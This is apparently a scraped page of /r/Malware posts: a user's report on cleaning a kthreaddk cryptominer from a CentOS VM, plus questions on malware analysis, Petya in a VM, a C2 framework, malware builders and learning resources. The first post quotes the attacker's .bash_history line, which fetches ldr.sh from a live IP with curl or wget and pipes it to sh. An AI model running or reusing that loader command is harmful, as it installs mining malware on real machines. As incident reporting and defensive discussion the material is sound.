/r/Malware

Photograph via snooOG

A place for malware reports and information.

A place for malware reports and information for [anti]malware professionals and enthusiasts.

This is NOT a place for help with malware removal or any type of tech support. Ask your IT support staff, your search engine of choice, another subreddit (/r/antivirus or /r/techsupport for example), or a friend or relative. In that order.

Content rules:

  • This is a subreddit for readers to discuss technical malware news, malware internals and infection techniques, malware tools, and anything related to the professional world of [anti]malware. Technical Support posts are forbidden and will result in removal and a possible ban.
  • Our readers are intelligent, or at the very least technically curious. Posted content must be highly technical, wel-researched, and of good quality.
  • Do not sensationalize or otherwise unnecessarily change the original title of the article you are linking. Clickbait will result in an immediate and permanent ban.

You might also be interested in:

Chat with us:

#reddit-malware:matrix.org

/r/Malware

73,478 Subscribers

9

kthreaddk malware on Centos 7.9

A search online indicates this is a crypto mining malware that's been there since 2020. Probably related to 'threaddk'.

I encountered it on my digitalocean VM running Centos 7.9. I had set up the VM to test out some legacy app.

Most sources link this malware to postgre but in my case I don't even have postgresql installed, let alone running.

I suspect the vulnerability that was exploited was the old version of Java that I am using - JDK 1.6.

I found this when I ran htop (after I noticed lagging due to high cpu usage):

 /usr/lib/jvm/java-1.6.0-openjdk-1.6.0.41.x86_64/jre/bin/java -classpath /tmp/~spawn1012433150472493028.tmp.dir metasploit.Payload

The tmp file had either been deleted or renamed. I couldn't find it.

Stopping this process didn't help..

As with the relatives, killing the kthreaddk processes just got them respawned.

The affected user was my ssh user (more on this later) so deleting the cron file just got it recreated.

To remove the cron successfully (hopefully), I did the following as root:

  1. Created another temporary user
  2. Added this new user to sudo list (visudo)
  3. Removed my ssh user from sudo list. This was to hopefully stop it from recreating the cron file. Adding the user to cron.deny file hadn't worked.
  4. Delete or edit the cron file.

Mine was /var/spool/cron/[username] with only this one line.

* * * * * /home/[username]/.cache/pip/http/1/3/2/6/l7nj8o
  1. Now I stopped kthreaddk processes

    pkill -9 kthreaddk

My initial plan had been to kill all processes by the ssh user. This hadn't worked for some reason.

  1. Delete the file referenced in the cron

Not surprisingly, the file wasn't available. I ended up clearing my entire .cache folder just to be safe.

After that the malware seems to have been kicked out.

Further analysis:Now that the server was a lot more responsive I embarked on checking a few things:

a) ls -al /tmp revealed a hidden folder called .pwn

In it there was a binary file called bprofr. A bit of Google shows it is also malicious. Not sure if it's related to the kthreaddk. I deleted the file just as a precaution.

b) I had mentioned ssh user. I haven't logged into this server for over a month. So when I ssh'd into it I got weird errors. Like the ones you get when you paste random text into a shell by mistake.

So after stopping the malware I checked my .bashrc and bash_profile. They are both extremely compromised.

Warning: The contents are potentially harmful! Cautiion advised

Here are the links to .bashrc and .bash_profile

I'll just post the .bash_history here:

(curl 194.38.23.2/ldr.sh?e39dc2||curl -k 194.38.23.2/ldr.sh?e39dc2||wget -O- 194.38.23.2/ldr.sh?e39dc2)|sh 1>/dev/null 2>&1 & ll pwd exit

I have not deleted the these files yet. I am tempted to log in again with the infected user to see if I can get the machine re-infected. The VM will be destroyed anyway as the testing is over.

2 Comments
2023/12/07
17:54 UTC

6

Petya Malware Analysis VM Issue

Hello!I'm getting into malware analysis for a university assignment, and I'm currently comparing Wannacry and Petya.Wannacry went fine in the virtual machine for dynamic analysis, but Petya began to write to the boot file, and now my Hyper V Windows 10 VM gives me the error that it can't boot?

I've tried it twice, reverting to checkpoint and restarting but I get the same Hyper V issue:No operating system was loaded.

https://preview.redd.it/0sp6ucuirm4c1.png?width=1020&format=png&auto=webp&s=d32c94030dfa44d67a72bfaadb713cc31f93b9ad

Does anyone know a fix by any chance?

Edit: Downgrading to Windows 7 fixed my issue, Petya now finally asks me to send it money

10 Comments
2023/12/06
07:53 UTC

4

Looking for the old Insane Reality zines by Immortal Riot

2 Comments
2023/12/03
16:58 UTC

9

Analyzing Malicious Microsoft Office Word Malware | HackTheBox Emo

We covered analyzing an office document that has an embedded Macro code written in Visual Basic. The document was claimed to cause ransomware infection so we performed a static analysis including extracting relevant strings, calculating the MD5 hash, metadata and revealing the hidden Macro routine using tools such as olevba. Then we submitted the hash to online analysis engines such as VirusTotal and it was found to be malicious in that it executes a Powershell command that contacts c2 server to download further payloads. We also found instances of XOR encryption along with the XOR key which then used to decrypt a characters that were encoded previously into decimal form.

Video is here

Writeup is here

1 Comment
2023/12/03
13:09 UTC

8

Portable executable explained throught rust code

https://itehax.com/blog/portable-executable-explained-throught-rust-code

Hi folks, in this guide I will explain the PE format and how to parse it, all using rust.

1 Comment
2023/11/24
11:19 UTC

60

Why did Stuxnet affected non nuclear industrial control system.

I understand that Stuxnet is capable of spreading to non nuclear industrial control system,but after infecting a non nuclear control system why did it negatively impacted those control systems. It would have been like "I have code to hinder a nuclear centrifuge, but this machine seems to be control system of non nuclear factory and I have no clue what to do other than end of code reached".

21 Comments
2023/11/23
18:28 UTC

24

Understanding Malware from the Inside

Hey everyone, I am a cybersecurity student getting my B. Sc. at UoPX and am currently studying for my GIAC, Pentest+, and ISC2 CC. I recently got heavily interested in threat hunting and threat intelligence, as I have always had a fascination with the destructive effects of APTs on their targets.

I have been volunteering my free time when I am not studying to analyzing malware and reporting live IP callbacks to CISA, IC3, and reporting those IPs and domains on AbuseIPDB. I have reported groups like BlackMatter, and the people behind Agent Tesla recently and even done write-ups explaining to the public about these groups and their methods of attack.

I have been programming in 14 languages for 12 years but recently I also took on C/C++ to start developing and testing the effects of self-built malware on VMs (VirtualBox). I wanted to understand how much work and expertise these groups have and educate the public about how to mitigate the threats, to understand how TAs use things like self-made crypters, and how they obfuscate their malware in order to make it FUD or at least mostly FUD.

This helps people understand their methods, and I aim to eventually develop an IDS of my own to help fight these threats and detect them before they become so destructive.

Please note, I ABSOLUTELY am not for the destructive uses of malware programming, but until you have programmed something like what attackers use you cannot fully understand how complicated and the depth of their knowledge / skillset.

I am excited to take my certifications, and I am planning to volunteer for the VIRT program in my state soon to further my knowledge on defending against threats.

23 Comments
2023/11/20
00:05 UTC

11

C2 Framework

If one developed a C2 Framework with pretty good windows evasion, poly- and metamorphic engines what would make the most sense to do while developing it further

  • Make it open source
  • Only use it during own red team engagements
  • Make it commercial
9 Comments
2023/11/18
17:36 UTC

9

Is there an encyclopedia of Dos Viruses and their payloads?

Hi there!

I have a collection of DOS viruses I want to experiment with on a VM but I'd like to know more information about these pieces of malware

Is there any sort of dos virus encyclopedia that I can get a description of payloads? I know some of these things are oddly specific and would like to get more info

9 Comments
2023/11/16
17:32 UTC

5

Creating a windows kernel manual mapper

Does any one have any good articles or blogs on creating a kernel manual mapper. I’ve read a few mappers like kdmapper and nullmapper, but I don’t understand them enough to go and find a vulnerable driver then make my own mapper. Any articles that could help me with this would be appreciated even if they arnt explicitly explaining how to make a manual mapper. Thx

4 Comments
2023/11/15
12:53 UTC

5

How do malware builders work?

AFAIK, most malware builders modify some type of information within a pre built stub to change their configuration. One way I have found is through Resources. One can modify and get Resources using simple WinAPI functions. What are the other ways?

10 Comments
2023/11/15
11:03 UTC

21

Ghidra reverse engineering malware filled with empty space.

I have been reverse engineering a piece of malware that attacked a friend of mine. Its a single executable around 70MB and upon loading it up I noticed that the majority of it is zero'ed out memory.
In a section called .ndata 60% of the program is interpreted like this:

0047b002 ?? ??

Which I'm assuming is either some unknown data type or the creators attempt of giving the executable enough size so that someone doesn't suspect the file size as it's supposed to be mocked up as a game.

I am quite new to ghidra and reverse engineering so if I've misinterpreted what this could be then please let me know, what do other people interpret this as?

9 Comments
2023/11/14
00:19 UTC

8

Video: .NETReactor deobfuscation and configuration decryption of AgentTesla

1 Comment
2023/11/12
08:11 UTC

4

Can FM Radio Receivers Be Physically Tracked or Exploited? Can Devices in Airplane Mode Be Physically Tracked or Exploited?

Assuming the devices have no malware on them.

Take an old iPod Nano or handheld device that can listen to local radio stations but can't go online, have no Bluetooth, etc. Pretend Snowden has one and he's listening to it as he walks around. If a team of NSA/CIA agents are physically following him or physically trying to locate him, is there any signal or identifying signal emanating from his device that can identify him, pinpoint him, or be used to follow him or locate him while he just listens to local radio? Could an adversary somehow send malware to his device via FM/AM radio?

Same questions but for an iPod Touch in airplane mode. And a laptop in airplane mode. And a smartphone in airplane mode.

I understand there are many variations, complexities, and firmware risks involved as well. But my question is more about what's going on via hardware and firmware when such devices are in airplane mode without having malware on the main OS at least. As well as whether bare bones devices like an old iPod Nano (without any malware) can be subject to tracking or exploitation via passive radio receiver or some other way.

Just curious.

7 Comments
2023/11/11
23:42 UTC

4

Gazprom Reborn

Does anyone know anymore about this ransom ware?

All I can find on them is this article. https://www.sentinelone.com/anthology/gazprom/

3 Comments
2023/11/10
14:42 UTC

44

VX-Underground is now selling Physical Copies of their archive!

Whats included?

  • 37,745 APT papers and samples

  • 7,147 archived materials (papers, old software, malware builders)

  • 11,460 malware papers

  • 36,000,000+ malware samples (5.06TB)

  • 3,197 malware source code(s) file(s)

  • $500 (this includes shipping)

  • Handwritten thank you letter

  • 10TB Seagate external HDD

  • Worldwide shipping

  • Delivery times vary (location, queue, ???)

https://www.vx-underwear.org/products/vx-underground-collection-hdd

7 Comments
2023/11/10
05:52 UTC

13

Starting point.

Anyone know any good interactive tutorials for learning C / C++. I am wanting to learn to one or both of those programming languages to get started on Mal analysis / RE. I know a few sites to learn but the whole "read 37 pages and then try it yourself without any examples or guidance" is not a very fun route to go for starting out. I feel like I would enjoy that more later on as an intermediate programmer.

10 Comments
2023/11/08
17:42 UTC

10

Best place to get specific malware samples

Hey - I am conducting a research project that involves looking at how much energy some malware forms take, and I want to focus specifically on energy eating malware types, like cryptominers. Where could I download such malware sample forms to help me with this research?

Thanks for the help

12 Comments
2023/11/02
12:41 UTC

15

Malware beginner roadmap

Hey!
I am a newbie in the filed and I wish to learn more
I am currently finishing the TCM-Security practical malware analysis and triage course
And I wish to learn more
what free/paid resources do you suggest?

11 Comments
2023/11/01
08:17 UTC

Back To Top